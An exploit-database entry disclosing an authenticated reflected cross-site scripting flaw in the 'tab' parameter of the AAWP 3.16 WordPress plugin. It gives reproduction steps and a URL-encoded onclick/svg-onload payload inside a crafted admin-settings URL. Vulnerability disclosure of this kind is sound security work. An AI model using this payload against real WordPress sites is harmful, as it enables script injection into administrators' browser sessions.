WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)

2022-01-05
ID: 105075
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.

# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.
1-4-2 (www01)